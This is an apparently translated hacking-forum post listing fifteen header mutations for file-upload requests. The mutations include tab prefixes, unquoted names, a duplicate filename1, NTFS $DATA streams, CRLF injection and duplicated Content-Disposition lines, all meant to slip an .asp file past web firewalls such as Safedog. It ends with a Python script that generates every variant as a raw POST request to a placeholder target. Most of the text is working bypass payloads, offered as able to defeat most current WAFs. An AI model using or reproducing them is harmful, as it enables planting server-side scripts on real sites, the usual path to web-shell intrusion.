taibeihacker
Moderator
Original default state:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="backlion.asp"
Content-Type: text/html
Bypass 0: prefix the filename with [0x09] (a tab):
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="[0x09]backlion.asp"
Content-Type: text/html
Bypass 1: drop the double quotes around the filename:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename=backlion.asp
Content-Type: text/html
Bypass 2: add an extra filename1 parameter with its own value:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="backlion.asp";filename1="test.jpg"
Content-Type: text/html
Bypass 3: change form to the combination f+orm:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name="filepath";filename="backlion.asp"
Content-Type: text/html
Bypass 4: mixed case in the file extension:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="backlion.Asp"
Content-Type: text/html
Bypass 5: remove the form-data token:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name="filepath"; filename="backlion.asp"
Content-Type: text/html
Bypass 6: add several spaces after "Content-Disposition:", or several spaces after "form-data;":
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition:      form-data; name="filepath"; filename="backlion.asp"
Content-Type: text/html
or:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data;      name="filepath"; filename="backlion.asp"
Content-Type: text/html
Bypass 7: backlion.asp . (space + dot) after the extension:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp ."
Content-Type: text/html
Bypass 8: a CRLF (carriage return + line feed) inside the quoted filename:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp
"
Content-Type: text/html
Bypass 9: NTFS alternate data stream, append :$DATA to the filename:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp:$DATA"
Content-Type: text/html
or:
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp:$DATA\0x00\fuck.asp0x00.jpg"
Content-Type: text/html
Bypass 10: testing against IIS 6.0 showed that it always takes the value from the first Content-Disposition as the received parameter, whereas Safedog (安全狗) always takes the value from the last Content-Disposition. So try building a request like the following [uploading backlion.asp succeeded]:
Content-Disposition: form-data; name="FileUploadName"; filename="backlion.asp"
-----------------------------15377259221471
Content-Disposition: form-data; name="FileUploadName"; filename="backlion.txt"
Content-Type: application/octet-stream
Content-Disposition: form-data; name="FileUploadName"; filename="backlion.asp"
Content-Disposition: form-data;
name="FileUploadName"; filename="backlion.asp"
Bypass 11: swap the order of Content-Type and Content-Disposition:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp"
Bypass 12: add a space in front of the filename (a tab works as well):
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename=" backlion.asp"
Content-Type: text/html
Bypass 13: add a space in form-data:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="uploaded"; filename="backlion.asp"
Content-Type: text/html
Bypass 14: add a + before or after form-data:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name="filepath"; filename="backlion.asp"
Content-Type: text/html
or:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name="filepath"; filename="backlion.asp"
Content-Type: text/html
Among the methods above, some also get past Safedog, and likewise D盾 (D-Shield), 360網站衛士 (360 Website Guard) and so on. Also, how would you classify the methods above? I group them into two kinds: features, and incorrect parsing by the WAF (PS: I'm not academic, this is rather colloquial). Features include system features, protocol features and so on; most of the methods above are protocol features, because the form-data protocol is very loose, and some are system features, such as adding a space, a dot, or an NTFS stream. Incorrect parsing covers, for example, the second method above, adding a filename1, which cannot be used under normal circumstances; and the 0th method, where special characters cannot be parsed, which in the end is also the WAF handling the content incorrectly. The methods above can bypass most current WAFs, and even where they are blocked, combining them sometimes produces results beyond imagination.
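The following script is an added example, not code from the original post. It builds the mutated multipart bodies listed above so they can be replayed against a test upload endpoint, and it emulates the two parser behaviours the post reports for Bypass 10 (backend honours the first filename=, WAF the last) alongside a toy signature rule keyed to the canonical header layout. The field name "filepath", the boundary, the placeholder host and path, the harmless ASP payload and both WAF rules are constructed assumptions; they do not model any real product.

```python
"""Mutated multipart/form-data upload bodies and a WAF/backend parsing differential.
Added example, not code from the original post.  Boundary, field name, payload,
placeholder host/path and the two toy WAF rules are constructed assumptions."""
import re

CRLF = "\r\n"
BOUNDARY = "----WebKitFormBoundary2smpsxFB3D0KbA7D"   # boundary used in the post
PAYLOAD = b'<% Response.Write("hello") %>'           # harmless ASP body (constructed)


def part(header_lines, data, boundary=BOUNDARY):
    """One multipart part: dash-boundary, header lines exactly as given, blank line, data."""
    head = "--" + boundary + CRLF + CRLF.join(header_lines) + CRLF + CRLF
    return head.encode("latin-1") + data + CRLF.encode("ascii")


def multipart_body(parts, boundary=BOUNDARY):
    """Concatenate parts and append the closing delimiter."""
    return b"".join(parts) + ("--" + boundary + "--" + CRLF).encode("ascii")


def variants(fname="backlion.asp", payload=PAYLOAD):
    """Header mutations from the post, keyed by its Bypass number; each value is a full body."""
    cd = 'Content-Disposition: form-data; name="filepath"; filename='
    ct = "Content-Type: text/html"
    headers = {
        "baseline":             [cd + f'"{fname}"', ct],
        "0 tab before name":    [cd + f'"\t{fname}"', ct],
        "1 no quotes":          [cd + fname, ct],
        "2 extra filename1":    [cd + f'"{fname}";filename1="test.jpg"', ct],
        "3 f+orm-data":         [f'Content-Disposition: f+orm-data; name="filepath";filename="{fname}"', ct],
        "4 suffix case":        [cd + f'"{fname[:-3]}Asp"', ct],
        "5 no form-data":       [f'Content-Disposition: name="filepath"; filename="{fname}"', ct],
        "6 padding spaces":     [f'Content-Disposition:      form-data; name="filepath"; filename="{fname}"', ct],
        "7 trailing space-dot": [cd + f'"{fname} ."', ct],
        "8 CRLF in filename":   [cd + f'"{fname}{CRLF}"', ct],
        "9 NTFS $DATA":         [cd + f'"{fname}:$DATA"', ct],
        "11 header order":      [ct, cd + f'"{fname}"'],
        "12 leading space":     [cd + f'" {fname}"', ct],
        "14 plus sign":         [f'Content-Disposition: +form-data; name="filepath"; filename="{fname}"', ct],
    }
    return {k: multipart_body([part(h, payload)]) for k, h in headers.items()}


def double_disposition(fname="backlion.asp", decoy="backlion.txt", payload=PAYLOAD):
    """Bypass 10, simplified to two Content-Disposition headers in one part:
    the post reports IIS 6.0 honours the first and Safedog the last."""
    return multipart_body([part([
        f'Content-Disposition: form-data; name="filepath"; filename="{fname}"',
        f'Content-Disposition: form-data; name="filepath"; filename="{decoy}"',
        "Content-Type: application/octet-stream",
    ], payload)])


# Lenient extraction of every filename= value, quoted or bare, any case.
FILENAME_RE = re.compile(rb'filename=(?:"([^"]*)"|([^;\r\n]*))', re.I)


def filename_seen(body, pick):
    """Emulated parser: pick='first' models the backend the post tested (IIS 6.0),
    pick='last' models the WAF it describes (Safedog).  None if no filename= at all."""
    names = [m.group(1) if m.group(1) is not None else m.group(2)
             for m in FILENAME_RE.finditer(body)]
    if not names:
        return None
    return (names[0] if pick == "first" else names[-1]).decode("latin-1")


def last_filename_blocked(body):
    """WAF rule as the post describes Safedog: judge only the LAST filename= value."""
    name = filename_seen(body, "last")
    return name is not None and name.lower().endswith(".asp")


# Toy WAF rule anchored to the canonical header layout (assumption, not a real product's rule).
STRICT_RE = re.compile(rb'Content-Disposition: form-data; name="[^"]*"; filename="[^"\s]*\.asp"\r\n')


def strict_signature_hits(body):
    return STRICT_RE.search(body) is not None


def evading_strict():
    """Variant names that slip past the canonical-layout rule while a lenient
    first-filename parser still finds an .asp name in the part."""
    return [name for name, body in variants().items()
            if not strict_signature_hits(body)
            and ".asp" in filename_seen(body, "first").lower()]


def raw_request(body, host="target.example", path="/upload.asp", boundary=BOUNDARY):
    """Wrap a body in a raw HTTP/1.1 POST for netcat or Burp Repeater (host/path are placeholders)."""
    head = (f"POST {path} HTTP/1.1{CRLF}Host: {host}{CRLF}"
            f"Content-Type: multipart/form-data; boundary={boundary}{CRLF}"
            f"Content-Length: {len(body)}{CRLF}{CRLF}")
    return head.encode("ascii") + body


if __name__ == "__main__":
    print("evade canonical-layout rule:", evading_strict())
    d = double_disposition()
    print("bypass 10: backend sees", repr(filename_seen(d, "first")),
          "/ WAF sees", repr(filename_seen(d, "last")))
    print(raw_request(d).decode("latin-1"))
```

The two emulated rules make the post's classification concrete: every variant except the baseline and the header-order swap defeats a rule written against the canonical `Content-Disposition` line, because the multipart grammar tolerates the mutation while a lenient first-match extractor still recovers an `.asp` name; and for the Bypass 10 body the first/last choice alone decides whether the WAF judges `backlion.txt` or the backend receives `backlion.asp`.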